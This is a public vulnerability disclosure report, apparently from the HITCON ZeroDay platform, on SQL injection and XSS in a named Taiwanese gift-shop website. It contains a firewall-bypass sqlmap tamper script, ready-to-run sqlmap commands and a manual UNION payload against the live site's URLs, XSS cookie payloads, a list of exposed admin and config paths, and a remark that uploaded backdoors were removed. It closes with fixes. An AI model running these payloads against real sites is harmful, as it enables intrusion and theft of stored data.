Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00045
- 發信 Vendor: 台灣禮品館
- Title: 台灣禮品館 網站存在 SQL injection 與 XSS
- Introduction: 網站存在 SQL injection 與 XSS
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/01/30 12:45:52 : 新提交 (由 BTtea 更新此狀態)
- 2023/01/30 12:46:47 : 新提交 (由 BTtea 更新此狀態)
- 2023/01/30 12:48:51 : 新提交 (由 BTtea 更新此狀態)
- 2023/01/30 12:50:22 : 新提交 (由 BTtea 更新此狀態)
- 2023/01/30 12:53:02 : 新提交 (由 BTtea 更新此狀態)
- 2023/02/01 09:43:44 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/02/02 12:45:35 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/02/02 12:45:35 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/02/02 12:45:35 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/04/01 03:00:08 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00045
- 通報者:blacktea_player (BTtea)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
使用工具 SQLmap 輔助測試 (以下若使用SQLmap工具進行注入時有中斷問題,請去除 --batch 參數後進行注入,遇到詢問連線異常是否繼續測試的訊息請選擇預設默認選項,通常是 y )
以下測試需附上我所撰寫的防火牆規則繞過腳本,將以下內容存成 bypass_taiwangoods.py 並放到 sqlmap -> tamper 資料夾裡,以供下方測試復現工具執行過程所引用
#!/usr/bin/env python
def dependencies():
pass
def tamper(payload, **kwargs):
if payload:
# union-based exploit
payload=payload.replace('UNION','/*!50000UNION*/')
# bypass select
payload=payload.replace('SELECT','/*!SELECT*/')
return payload-
SQL injection
-
https://www.taiwangoods.com.tw/shop/shop.php?html=showgoods&gid=40196
GET 參數 gid 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "https://www.taiwangoods.com.tw/shop/shop.php?html=showgoods&gid=40196" --tamper bypass_taiwangoods -p gid --dbs --batch運行結果
-
https://www.taiwangoods.com.tw/shop/shop.php?type222=&keyword=123&submit_search=&html=list_goods
GET 參數 keyword 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "https://www.taiwangoods.com.tw/shop/shop.php?type222=&keyword=123&submit_search=&html=list_goods" --tamper bypass_taiwangoods --prefix "') or 1 " -p keyword --dbs --batch --technique BU運行結果
-
https://www.taiwangoods.com.tw/shop/shop.php?html=news2_detail&aid=8015
GET 參數 aid 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "https://www.taiwangoods.com.tw/shop/shop.php?html=news2_detail&aid=8015" --tamper bypass_taiwangoods -p aid --dbs --batch運行結果
-
https://www.taiwangoods.com.tw/shop/shop.php?html=news2&Tsubject=92
GET 參數 Tsubject 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "https://www.taiwangoods.com.tw/shop/shop.php?html=news2&Tsubject=92" --tamper bypass_taiwangoods -p Tsubject --dbs --batch運行結果
-
https://www.taiwangoods.com.tw/shop/shop.php?html=action&Fid=20019
GET 參數 Fid 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "https://www.taiwangoods.com.tw/shop/shop.php?html=action&Fid=20019" --tamper bypass_taiwangoods -p Fid --dbs --batch --technique BU --text-only運行結果
-
https://www.taiwangoods.com.tw/shop/shop.php?html=news&newstype=常見問題
GET 參數 newstype 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "https://www.taiwangoods.com.tw/shop/shop.php?html=news&newstype=常見問題" --tamper bypass_taiwangoods -p newstype --dbs --batch --technique BTU --text-only運行結果
-
https://www.taiwangoods.com.tw/shop/shop.php?html=news_detail&nid=49
GET 參數 nid 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "https://www.taiwangoods.com.tw/shop/shop.php?html=news_detail&nid=49" --tamper bypass_taiwangoods -p nid --dbs --batch運行結果
-
https://www.taiwangoods.com.tw/shop/shop.php?html=list_goods&mydata3s[]=台灣特色&mydata3s[]=旅行紀念品
GET 參數 mydata3s[] 存在 SQL injection
這個用工具打不太出來,只能附上手動測試結果的有效負載https://www.taiwangoods.com.tw/shop/shop.php?html=list_goods&mydata3s[]=台灣特色&mydata3s[]=旅行紀念品') and%20 0 /*!50000union*//*!select*/ 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234-- -運行結果
以上 GET 參數:gid,keyword,newstype,mydata3s[],皆會受到 XSS 攻擊
xss payload
"><script>alert(document.cookie)</script>運行結果
-
XSS
https://www.taiwangoods.com.tw/shop/shop.php?html=list_goods&type=10000/10239/10351/10382
xss payload">xss test</option></select><script>alert(document.cookie)</script><!-- -運行結果
-
無意義但不應該被存取的站點目錄可能導致資訊洩漏或其他危害
http://www.taiwangoods.com.tw/shop/shopadmin (後台)
http://www.taiwangoods.com.tw/shop/config.inc.php
http://www.taiwangoods.com.tw/shop/index2.php
http://www.taiwangoods.com.tw/shop/phpinfo.php
http://www.taiwangoods.com.tw/shop/test.php
上傳之後門已盡數刪除
修補建議
建議可以使用 htmlspecialchars 函式來預防 XSS
htmlspecialchars用法:
https://www.w3schools.com/php/func_string_htmlspecialchars.asp
XSS攻擊防禦原理解說:(wiki):
https://zh.wikipedia.org/zh-tw/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC
建議可以使用 PDO 框架或者 mysqli_real_escape_string 函式,或者改寫成參數化查詢來預防 SQL injection。
PDO用法:
https://blog.tarswork.com/article/quick-start-operation-mysql-using-php-pdo/
mysqli_real_escape_string用法:
https://www.runoob.com/php/func-mysqli-real-escape-string.html
參數化查詢原理解說(wiki):
https://zh.wikipedia.org/zh-tw/%E5%8F%83%E6%95%B8%E5%8C%96%E6%9F%A5%E8%A9%A2
SQL injection 攻擊成因解說(wiki):
https://zh.wikipedia.org/zh-tw/SQL%E6%B3%A8%E5%85%A5